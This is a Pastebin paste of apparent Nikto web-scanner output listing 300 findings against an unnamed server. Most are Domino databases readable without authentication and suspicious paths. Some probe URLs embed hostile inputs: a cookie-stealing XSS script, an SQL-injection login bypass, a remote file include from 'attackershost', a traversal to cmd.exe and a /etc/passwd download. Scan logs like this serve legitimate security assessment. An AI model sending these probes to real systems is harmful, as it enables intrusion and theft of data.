API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 13th, 2010
6,598
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 80.16 KB | None | 0 0
raw download clone embed print report
  1. + OSVDB-3092: /default.nsf: This database can be read without authentication, which may reveal sensitive information.
  2. + OSVDB-3092: /dirassist.nsf: This database can be read without authentication, which may reveal sensitive information.
  3. + OSVDB-3092: /doladmin.nsf: This database can be read without authentication, which may reveal sensitive information.
  4. + OSVDB-3092: /dols_help.nsf: This database can be read without authentication, which may reveal sensitive information.
  5. + OSVDB-3092: /domadmin.nsf: This database can be read without authentication, which may reveal sensitive information.
  6. + OSVDB-3092: /domcfg.nsf: This database can be read without authentication, which may reveal sensitive information.
  7. + OSVDB-3092: /event.nsf: This database can be read without authentication, which may reveal sensitive information.
  8. + OSVDB-3092: /events.nsf: This database can be read without authentication, which may reveal sensitive information.
  9. + OSVDB-3092: /events5.nsf: This database can be read without authentication, which may reveal sensitive information.
  10. + OSVDB-3092: /group.nsf: This database can be read without authentication, which may reveal sensitive information.
  11. + OSVDB-3092: /groups.nsf: This database can be read without authentication, which may reveal sensitive information.
  12. + OSVDB-3092: /help5_admin.nsf: This database can be read without authentication, which may reveal sensitive information.
  13. + OSVDB-3092: /help5_client.nsf: This database can be read without authentication, which may reveal sensitive information.
  14. + OSVDB-3092: /help5_designer.nsf: This database can be read without authentication, which may reveal sensitive information.
  15. + OSVDB-3092: /homepage.nsf: This database can be read without authentication, which may reveal sensitive information.
  16. + OSVDB-3092: /iNotes/Forms5.nsf: This database can be read without authentication, which may reveal sensitive information.
  17. + OSVDB-3092: /iNotes/Forms5.nsf/$DefaultNav: This database can be read without authentication, which may reveal sensitive information.
  18. + OSVDB-3092: /jotter.nsf: This database can be read without authentication, which may reveal sensitive information.
  19. + OSVDB-3092: /kbccv11.nsf: This database can be read without authentication, which may reveal sensitive information.
  20. + OSVDB-3092: /kbnv11.nsf: This database can be read without authentication, which may reveal sensitive information.
  21. + OSVDB-3092: /kbssvv11.nsf: This database can be read without authentication, which may reveal sensitive information.
  22. + OSVDB-3092: /lcon.nsf: This database can be read without authentication, which may reveal sensitive information.
  23. + OSVDB-3092: /ldap.nsf: This database can be read without authentication, which may reveal sensitive information.
  24. + OSVDB-3092: /leiadm.nsf: This database can be read without authentication, which may reveal sensitive information.
  25. + OSVDB-3092: /leilog.nsf: This database can be read without authentication, which may reveal sensitive information.
  26. + OSVDB-3092: /leivlt.nsf: This database can be read without authentication, which may reveal sensitive information.
  27. + OSVDB-3092: /log4a.nsf: This database can be read without authentication, which may reveal sensitive information.
  28. + OSVDB-3092: /lsxlc.nsf: This database can be read without authentication, which may reveal sensitive information.
  29. + OSVDB-3092: /l_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
  30. + OSVDB-3092: /mab.nsf: This database can be read without authentication, which may reveal sensitive information.
  31. + OSVDB-3092: /mail/adminisist.nsf: This database can be read without authentication, which may reveal sensitive information.
  32. + OSVDB-3092: /mail1.box: This database can be read without authentication, which may reveal sensitive information.
  33. + OSVDB-3092: /mail10.box: This database can be read without authentication, which may reveal sensitive information.
  34. + OSVDB-3092: /mail2.box: This database can be read without authentication, which may reveal sensitive information.
  35. + OSVDB-3092: /mail3.box: This database can be read without authentication, which may reveal sensitive information.
  36. + OSVDB-3092: /mail4.box: This database can be read without authentication, which may reveal sensitive information.
  37. + OSVDB-3092: /mail5.box: This database can be read without authentication, which may reveal sensitive information.
  38. + OSVDB-3092: /mail6.box: This database can be read without authentication, which may reveal sensitive information.
  39. + OSVDB-3092: /mail7.box: This database can be read without authentication, which may reveal sensitive information.
  40. + OSVDB-3092: /mail8.box: This database can be read without authentication, which may reveal sensitive information.
  41. + OSVDB-3092: /mail9.box: This database can be read without authentication, which may reveal sensitive information.
  42. + OSVDB-3092: /mailw46.nsf: This database can be read without authentication, which may reveal sensitive information.
  43. + OSVDB-3092: /msdwda.nsf: This database can be read without authentication, which may reveal sensitive information.
  44. + OSVDB-3092: /mtatbls.nsf: This database can be read without authentication, which may reveal sensitive information.
  45. + OSVDB-3092: /mtdata/mtstore.nsf: This database can be read without authentication, which may reveal sensitive information.
  46. + OSVDB-3092: /mtstore.nsf: This database can be read without authentication, which may reveal sensitive information.
  47. + OSVDB-3092: /nntp/nd000000.nsf: This database can be read without authentication, which may reveal sensitive information.
  48. + OSVDB-3092: /nntp/nd000001.nsf: This database can be read without authentication, which may reveal sensitive information.
  49. + OSVDB-3092: /nntp/nd000002.nsf: This database can be read without authentication, which may reveal sensitive information.
  50. + OSVDB-3092: /nntp/nd000003.nsf: This database can be read without authentication, which may reveal sensitive information.
  51. + OSVDB-3092: /nntp/nd000004.nsf: This database can be read without authentication, which may reveal sensitive information.
  52. + OSVDB-3092: /nntppost.nsf: This database can be read without authentication, which may reveal sensitive information.
  53. + OSVDB-3092: /notes.nsf: This database can be read without authentication, which may reveal sensitive information.
  54. + OSVDB-3092: /ntsync4.nsf: This database can be read without authentication, which may reveal sensitive information.
  55. + OSVDB-3092: /ntsync45.nsf: This database can be read without authentication, which may reveal sensitive information.
  56. + OSVDB-3092: /perweb.nsf: This database can be read without authentication, which may reveal sensitive information.
  57. + OSVDB-3092: /private.nsf: This database can be read without authentication, which may reveal sensitive information.
  58. + OSVDB-3092: /public.nsf: This database can be read without authentication, which may reveal sensitive information.
  59. + OSVDB-3092: /qpadmin.nsf: This database can be read without authentication, which may reveal sensitive information.
  60. + OSVDB-3092: /quickplace/quickplace/main.nsf: This database can be read without authentication, which may reveal sensitive information.
  61. + OSVDB-3092: /quickstart/qstart50.nsf: This database can be read without authentication, which may reveal sensitive information.
  62. + OSVDB-3092: /quickstart/wwsample.nsf: This database can be read without authentication, which may reveal sensitive information.
  63. + OSVDB-3092: /readme.nsf: This database can be read without authentication, which may reveal sensitive information.
  64. + OSVDB-3092: /reports.nsf: This database can be read without authentication, which may reveal sensitive information.
  65. + OSVDB-3092: /sample/faqw46: This database can be read without authentication, which may reveal sensitive information.
  66. + OSVDB-3092: /sample/framew46: This database can be read without authentication, which may reveal sensitive information.
  67. + OSVDB-3092: /sample/pagesw46: This database can be read without authentication, which may reveal sensitive information.
  68. + OSVDB-3092: /sample/siregw46: This database can be read without authentication, which may reveal sensitive information.
  69. + OSVDB-3092: /sample/site1w4646: This database can be read without authentication, which may reveal sensitive information.
  70. + OSVDB-3092: /sample/site2w4646: This database can be read without authentication, which may reveal sensitive information.
  71. + OSVDB-3092: /sample/site3w4646: This database can be read without authentication, which may reveal sensitive information.
  72. + OSVDB-3092: /schema50.nsf: This database can be read without authentication, which may reveal sensitive information.
  73. + OSVDB-3092: /secret.nsf: This database can be read without authentication, which may reveal sensitive information.
  74. + OSVDB-3092: /setupweb.nsf: This database can be read without authentication, which may reveal sensitive information.
  75. + OSVDB-3092: /smbcfg.nsf: This database can be read without authentication, which may reveal sensitive information.
  76. + OSVDB-3092: /smconf.nsf: This database can be read without authentication, which may reveal sensitive information.
  77. + OSVDB-3092: /smency.nsf: This database can be read without authentication, which may reveal sensitive information.
  78. + OSVDB-3092: /smmsg.nsf: This database can be read without authentication, which may reveal sensitive information.
  79. + OSVDB-3092: /smquar.nsf: This database can be read without authentication, which may reveal sensitive information.
  80. + OSVDB-3092: /smsolar.nsf: This database can be read without authentication, which may reveal sensitive information.
  81. + OSVDB-3092: /smtime.nsf: This database can be read without authentication, which may reveal sensitive information.
  82. + OSVDB-3092: /smtp.box: This database can be read without authentication, which may reveal sensitive information.
  83. + OSVDB-3092: /smtp.nsf: This database can be read without authentication, which may reveal sensitive information.
  84. + OSVDB-3092: /smtpibwq.nsf: This database can be read without authentication, which may reveal sensitive information.
  85. + OSVDB-3092: /smtpobwq.nsf: This database can be read without authentication, which may reveal sensitive information.
  86. + OSVDB-3092: /smtptbls.nsf: This database can be read without authentication, which may reveal sensitive information.
  87. + OSVDB-3092: /smvlog.nsf: This database can be read without authentication, which may reveal sensitive information.
  88. + OSVDB-3092: /software.nsf: This database can be read without authentication, which may reveal sensitive information.
  89. + OSVDB-3092: /srvnam.htm: This database can be read without authentication, which may reveal sensitive information.
  90. + OSVDB-3092: /statmail.nsf: This database can be read without authentication, which may reveal sensitive information.
  91. + OSVDB-3092: /stauths.nsf: This database can be read without authentication, which may reveal sensitive information.
  92. + OSVDB-3092: /stautht.nsf: This database can be read without authentication, which may reveal sensitive information.
  93. + OSVDB-3092: /stconf.nsf: This database can be read without authentication, which may reveal sensitive information.
  94. + OSVDB-3092: /stconfig.nsf: This database can be read without authentication, which may reveal sensitive information.
  95. + OSVDB-3092: /stdnaset.nsf: This database can be read without authentication, which may reveal sensitive information.
  96. + OSVDB-3092: /stdomino.nsf: This database can be read without authentication, which may reveal sensitive information.
  97. + OSVDB-3092: /stlog.nsf: This database can be read without authentication, which may reveal sensitive information.
  98. + OSVDB-3092: /streg.nsf: This database can be read without authentication, which may reveal sensitive information.
  99. + OSVDB-3092: /stsrc.nsf: This database can be read without authentication, which may reveal sensitive information.
  100. + OSVDB-3092: /test.nsf: This database can be read without authentication, which may reveal sensitive information.
  101. + OSVDB-3092: /today.nsf: This database can be read without authentication, which may reveal sensitive information.
  102. + OSVDB-3092: /userreg.nsf: This database can be read without authentication, which may reveal sensitive information.
  103. + OSVDB-3092: /users.nsf: This database can be read without authentication, which may reveal sensitive information.
  104. + OSVDB-3092: /vpuserinfo.nsf: This database can be read without authentication, which may reveal sensitive information.
  105. + OSVDB-3092: /web.nsf: This database can be read without authentication, which may reveal sensitive information.
  106. + OSVDB-3092: /webuser.nsf: This database can be read without authentication, which may reveal sensitive information.
  107. + OSVDB-3092: /welcome.nsf: This database can be read without authentication, which may reveal sensitive information.
  108. + OSVDB-3092: /wksinst.nsf: This database can be read without authentication, which may reveal sensitive information.
  109. + OSVDB-3093: /finance.xls: Finance spreadsheet?
  110. + OSVDB-3093: /finances.xls: Finance spreadsheet?
  111. + OSVDB-3093: /abonnement.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  112. + OSVDB-3093: /acartpath/signin.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  113. + OSVDB-3093: /add_acl: This might be interesting... has been seen in web logs from an unknown scanner.
  114. + OSVDB-3093: /admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]: This might be interesting... has been seen in web logs from an unknown scanner.
  115. + OSVDB-3093: /admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
  116. + OSVDB-3093: /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  117. + OSVDB-3093: /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  118. + OSVDB-3093: /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  119. + OSVDB-3093: /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  120. + OSVDB-3093: /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
  121. + OSVDB-3093: /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
  122. + OSVDB-3093: /admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  123. + OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  124. + OSVDB-3093: /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  125. + OSVDB-3093: /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
  126. + OSVDB-3093: /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
  127. + OSVDB-3093: /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  128. + OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
  129. + OSVDB-3093: /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
  130. + OSVDB-3093: /admin_t/include/aff_liste_langue.php: This might be interesting... has been seen in web logs from an unknown scanner.
  131. + OSVDB-3093: /adv/gm001-mc/: This might be interesting... has been seen in web logs from an unknown scanner.
  132. + OSVDB-3093: /aff_news.php: This might be interesting... has been seen in web logs from an unknown scanner.
  133. + OSVDB-3093: /approval/ts_app.htm: This might be interesting... has been seen in web logs from an unknown scanner.
  134. + OSVDB-3093: /archive.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  135. + OSVDB-3093: /archive_forum.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  136. + OSVDB-3093: /ashnews.php: This might be interesting... has been seen in web logs from an unknown scanner.
  137. + OSVDB-3093: /auth.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  138. + OSVDB-3093: /b2-tools/gm-2-b2.php: This might be interesting... has been seen in web logs from an unknown scanner.
  139. + OSVDB-3093: /bandwidth/index.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  140. + OSVDB-3093: /basilix.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  141. + OSVDB-3093: /bigsam_guestbook.php?displayBegin=9999...9999: This might be interesting... has been seen in web logs from an unknown scanner.
  142. + OSVDB-3093: /bin/common/user_update_passwd.pl: This might be interesting... has been seen in web logs from an unknown scanner.
  143. + OSVDB-3093: /biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  144. + OSVDB-3093: /biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  145. + OSVDB-3093: /board/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  146. + OSVDB-3093: /board/philboard_admin.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
  147. + OSVDB-3093: /bugtest+/+: This might be interesting... has been seen in web logs from an unknown scanner.
  148. + OSVDB-3093: /caupo/admin/admin_workspace.php: This might be interesting... has been seen in web logs from an unknown scanner.
  149. + OSVDB-3093: /ccbill/whereami.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  150. + OSVDB-3093: /chat_dir/register.php: This might be interesting... has been seen in web logs from an unknown scanner.
  151. + OSVDB-3093: /checkout_payment.php: This might be interesting... has been seen in web logs from an unknown scanner.
  152. + OSVDB-3093: /communique.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  153. + OSVDB-3093: /community/forumdisplay.php: This might be interesting... has been seen in web logs from an unknown scanner.
  154. + OSVDB-3093: /community/index.php?analized=anything: This might be interesting... has been seen in web logs from an unknown scanner.
  155. + OSVDB-3093: /community/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
  156. + OSVDB-3093: /compte.php: This might be interesting... has been seen in web logs from an unknown scanner.
  157. + OSVDB-3093: /config/html/cnf_gi.htm: This might be interesting... has been seen in web logs from an unknown scanner.
  158. + OSVDB-3093: /convert-date.php: This might be interesting... has been seen in web logs from an unknown scanner.
  159. + OSVDB-3093: /cp/rac/nsManager.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  160. + OSVDB-3093: /csPassword.cgi?command=remove%20: This might be interesting... has been seen in web logs from an unknown scanner.
  161. + OSVDB-3093: /cutenews/comments.php: This might be interesting... has been seen in web logs from an unknown scanner.
  162. + OSVDB-3093: /cutenews/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
  163. + OSVDB-3093: /cutenews/shownews.php: This might be interesting... has been seen in web logs from an unknown scanner.
  164. + OSVDB-3093: /Data/settings.xml+: This might be interesting... has been seen in web logs from an unknown scanner.
  165. + OSVDB-3093: /database/metacart.mdb+: This might be interesting... has been seen in web logs from an unknown scanner.
  166. + OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
  167. + OSVDB-3093: /dbabble: This might be interesting... has been seen in web logs from an unknown scanner.
  168. + OSVDB-3093: /dcp/advertiser.php: This might be interesting... has been seen in web logs from an unknown scanner.
  169. + OSVDB-3093: /defines.php: This might be interesting... has been seen in web logs from an unknown scanner.
  170. + OSVDB-3093: /dltclnt.php: This might be interesting... has been seen in web logs from an unknown scanner.
  171. + OSVDB-3093: /doc/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  172. + OSVDB-3093: /docs/NED: This might be interesting... has been seen in web logs from an unknown scanner.
  173. + OSVDB-3093: /dotproject/modules/files/index_table.php: This might be interesting... has been seen in web logs from an unknown scanner.
  174. + OSVDB-3093: /dotproject/modules/projects/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  175. + OSVDB-3093: /dotproject/modules/projects/view.php: This might be interesting... has been seen in web logs from an unknown scanner.
  176. + OSVDB-3093: /dotproject/modules/projects/vw_files.php: This might be interesting... has been seen in web logs from an unknown scanner.
  177. + OSVDB-3093: /dotproject/modules/tasks/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  178. + OSVDB-3093: /dotproject/modules/tasks/viewgantt.php: This might be interesting... has been seen in web logs from an unknown scanner.
  179. + OSVDB-3093: /do_map: This might be interesting... has been seen in web logs from an unknown scanner.
  180. + OSVDB-3093: /do_subscribe: This might be interesting... has been seen in web logs from an unknown scanner.
  181. + OSVDB-3093: /email.php: This might be interesting... has been seen in web logs from an unknown scanner.
  182. + OSVDB-3093: /emml_email_func.php: This might be interesting... has been seen in web logs from an unknown scanner.
  183. + OSVDB-3093: /emumail.cgi?type=.%00: This might be interesting... has been seen in web logs from an unknown scanner.
  184. + OSVDB-3093: /entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  185. + OSVDB-3093: /enteteacceuil.php: This might be interesting... has been seen in web logs from an unknown scanner.
  186. + OSVDB-3093: /etc/shadow+: This might be interesting... has been seen in web logs from an unknown scanner.
  187. + OSVDB-3093: /eventcal2.php.php: This might be interesting... has been seen in web logs from an unknown scanner.
  188. + OSVDB-3093: /ez2000/ezadmin.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  189. + OSVDB-3093: /ez2000/ezboard.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  190. + OSVDB-3093: /ez2000/ezman.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  191. + OSVDB-3093: /faqman/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  192. + OSVDB-3093: /filemanager/index.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  193. + OSVDB-3093: /filemgmt/brokenfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  194. + OSVDB-3093: /filemgmt/singlefile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  195. + OSVDB-3093: /filemgmt/viewcat.php: This might be interesting... has been seen in web logs from an unknown scanner.
  196. + OSVDB-3093: /filemgmt/visit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  197. + OSVDB-3093: /foro/YaBB.pl: This might be interesting... has been seen in web logs from an unknown scanner.
  198. + OSVDB-3093: /forum/mainfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  199. + OSVDB-3093: /forum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
  200. + OSVDB-3093: /forum/newreply.php: This might be interesting... has been seen in web logs from an unknown scanner.
  201. + OSVDB-3093: /forum/newthread.php: This might be interesting... has been seen in web logs from an unknown scanner.
  202. + OSVDB-3093: /forum/viewtopic.php: phpBB found.
  203. + OSVDB-3093: /forum_arc.asp?n=268: This might be interesting... has been seen in web logs from an unknown scanner.
  204. + OSVDB-3093: /forum_professionnel.asp?n=100: This might be interesting... has been seen in web logs from an unknown scanner.
  205. + OSVDB-3093: /functions.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  206. + OSVDB-10447: /get_od_toc.pl?Profile=: WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.
  207. + OSVDB-3093: /globals.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  208. + OSVDB-3093: /globals.pl: This might be interesting... has been seen in web logs from an unknown scanner.
  209. + OSVDB-6656: /Gozila.cgi: Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.
  210. + OSVDB-3093: /homebet/homebet.dll?form=menu&option=menu-signin: This might be interesting... has been seen in web logs from an unknown scanner.
  211. + OSVDB-3093: /idealbb/error.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  212. + OSVDB-3093: /iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  213. + OSVDB-3093: /include/customize.php: This might be interesting... has been seen in web logs from an unknown scanner.
  214. + OSVDB-3093: /include/help.php: This might be interesting... has been seen in web logs from an unknown scanner.
  215. + OSVDB-3093: /includes/footer.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  216. + OSVDB-3093: /includes/header.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  217. + OSVDB-3093: /index.php?base=test%20: This might be interesting... has been seen in web logs from an unknown scanner.
  218. + OSVDB-3093: /index.php?IDAdmin=test: This might be interesting... has been seen in web logs from an unknown scanner.
  219. + OSVDB-3093: /index.php?pymembs=admin: This might be interesting... has been seen in web logs from an unknown scanner.
  220. + OSVDB-3093: /index.php?SqlQuery=test%20: This might be interesting... has been seen in web logs from an unknown scanner.
  221. + OSVDB-3093: /index.php?tampon=test%20: This might be interesting... has been seen in web logs from an unknown scanner.
  222. + OSVDB-3093: /index.php?topic=<script>alert(document.cookie)</script>%20: This might be interesting... has been seen in web logs from an unknown scanner.
  223. + OSVDB-3093: /infos/contact/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  224. + OSVDB-3093: /infos/faq/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  225. + OSVDB-3093: /infos/gen/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  226. + OSVDB-3093: /infos/services/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
  227. + OSVDB-3093: /instaboard/index.cfm: This might be interesting... has been seen in web logs from an unknown scanner.
  228. + OSVDB-3093: /intranet/browse.php: This might be interesting... has been seen in web logs from an unknown scanner.
  229. + OSVDB-3093: /invitefriends.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  230. + OSVDB-3093: /ipchat.php: This might be interesting... has been seen in web logs from an unknown scanner.
  231. + OSVDB-3093: /ixmail_netattach.php: This might be interesting... has been seen in web logs from an unknown scanner.
  232. + OSVDB-3093: /jsptest.jsp+: This might be interesting... has been seen in web logs from an unknown scanner.
  233. + OSVDB-3093: /kernel/class/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  234. + OSVDB-3093: /kernel/classes/ezrole.php: This might be interesting... has been seen in web logs from an unknown scanner.
  235. + OSVDB-3093: /ldap.search.php3?ldap_serv=nonsense%20: This might be interesting... has been seen in web logs from an unknown scanner.
  236. + OSVDB-3093: /livredor/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  237. + OSVDB-3093: /login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
  238. + OSVDB-3093: /mail/include.html: This might be interesting... has been seen in web logs from an unknown scanner.
  239. + OSVDB-3093: /mail/settings.html: This might be interesting... has been seen in web logs from an unknown scanner.
  240. + OSVDB-3093: /mail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  241. + OSVDB-3093: /mambo/banners.php: This might be interesting... has been seen in web logs from an unknown scanner.
  242. + OSVDB-3093: /manage/login.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
  243. + OSVDB-3093: /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting... has been seen in web logs from an unknown scanner.
  244. + OSVDB-3093: /members/ID.pm: This might be interesting... has been seen in web logs from an unknown scanner.
  245. + OSVDB-3093: /members/ID.xbb: This might be interesting... has been seen in web logs from an unknown scanner.
  246. + OSVDB-3093: /mod.php: This might be interesting... has been seen in web logs from an unknown scanner.
  247. + OSVDB-3093: /modif/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  248. + OSVDB-3093: /modif/ident.php: This might be interesting... has been seen in web logs from an unknown scanner.
  249. + OSVDB-3093: /modules/Downloads/voteinclude.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  250. + OSVDB-3093: /modules/Forums/attachment.php: This might be interesting... has been seen in web logs from an unknown scanner.
  251. + OSVDB-3093: /modules/Search/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  252. + OSVDB-3093: /modules/WebChat/in.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  253. + OSVDB-3093: /modules/WebChat/out.php: This might be interesting... has been seen in web logs from an unknown scanner.
  254. + OSVDB-3093: /modules/WebChat/quit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  255. + OSVDB-3093: /modules/WebChat/users.php: This might be interesting... has been seen in web logs from an unknown scanner.
  256. + OSVDB-3093: /modules/Your_Account/navbar.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  257. + OSVDB-3093: /moregroupware/modules/webmail2/inc/: This might be interesting... has been seen in web logs from an unknown scanner.
  258. + OSVDB-3093: /msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  259. + OSVDB-3093: /myguestBk/add1.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  260. + OSVDB-3093: /myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  261. + OSVDB-3093: /myguestBk/admin/index.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  262. + OSVDB-3093: /netget?sid=Safety&msg=2002&file=Safety: This might be interesting... has been seen in web logs from an unknown scanner.
  263. + OSVDB-3093: /newtopic.php: This might be interesting... has been seen in web logs from an unknown scanner.
  264. + OSVDB-3093: /nphp/nphpd.php: This might be interesting... has been seen in web logs from an unknown scanner.
  265. + OSVDB-3093: /OpenTopic: This might be interesting... has been seen in web logs from an unknown scanner.
  266. + OSVDB-3093: /options.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  267. + OSVDB-3093: /oscommerce/default.php: This might be interesting... has been seen in web logs from an unknown scanner.
  268. + OSVDB-3093: /parse_xml.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  269. + OSVDB-3093: /php/gaestebuch/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  270. + OSVDB-3093: /php/php4ts.dll: This might be interesting... has been seen in web logs from an unknown scanner.
  271. + OSVDB-3093: /pks/lookup: This might be interesting... has been seen in web logs from an unknown scanner.
  272. + OSVDB-3093: /pm/lib.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  273. + OSVDB-3093: /poppassd.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
  274. + OSVDB-3093: /produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  275. + OSVDB-3093: /productcart/database/EIPC.mdb: This might be interesting... has been seen in web logs from an unknown scanner.
  276. + OSVDB-3093: /productcart/pc/Custva.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  277. + OSVDB-3093: /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  278. + OSVDB-3093: /product_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
  279. + OSVDB-3093: /prometheus-all/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  280. + OSVDB-3093: /proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\": This might be interesting... has been seen in web logs from an unknown scanner.
  281. + OSVDB-3093: /protected/: This might be interesting... has been seen in web logs from an unknown scanner.
  282. + OSVDB-3093: /protected/secret.html+: This might be interesting... has been seen in web logs from an unknown scanner.
  283. + OSVDB-3093: /protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=': This might be interesting... has been seen in web logs from an unknown scanner.
  284. + OSVDB-3093: /protection.php: This might be interesting... has been seen in web logs from an unknown scanner.
  285. + OSVDB-3093: /pt_config.inc: This might be interesting... has been seen in web logs from an unknown scanner.
  286. + OSVDB-3093: /pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20: This might be interesting... has been seen in web logs from an unknown scanner.
  287. + OSVDB-3093: /pvote/del.php?pollorder=1%20: This might be interesting... has been seen in web logs from an unknown scanner.
  288. + OSVDB-3093: /quikmail/nph-emumail.cgi?type=../%00: This might be interesting... has been seen in web logs from an unknown scanner.
  289. + OSVDB-3093: /room/save_item.php: This might be interesting... has been seen in web logs from an unknown scanner.
  290. + OSVDB-3093: /screen.php: This might be interesting... has been seen in web logs from an unknown scanner.
  291. + OSVDB-3093: /scripts/tradecli.dll: This might be interesting... has been seen in web logs from an unknown scanner.
  292. + OSVDB-3093: /scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir: This might be interesting... has been seen in web logs from an unknown scanner.
  293. + OSVDB-3093: /security/web_access.html: This might be interesting... has been seen in web logs from an unknown scanner.
  294. + OSVDB-3093: /sendphoto.php: This might be interesting... has been seen in web logs from an unknown scanner.
  295. + OSVDB-3093: /servers/link.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  296. + OSVDB-3093: /shop/php_files/site.config.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  297. + OSVDB-3093: /shop/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
  298. + OSVDB-3093: /shop/show.php: This might be interesting... has been seen in web logs from an unknown scanner.
  299. + OSVDB-3093: /Site/biztalkhttpreceive.dll: This might be interesting... has been seen in web logs from an unknown scanner.
  300. + OSVDB-3093: /site_searcher.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
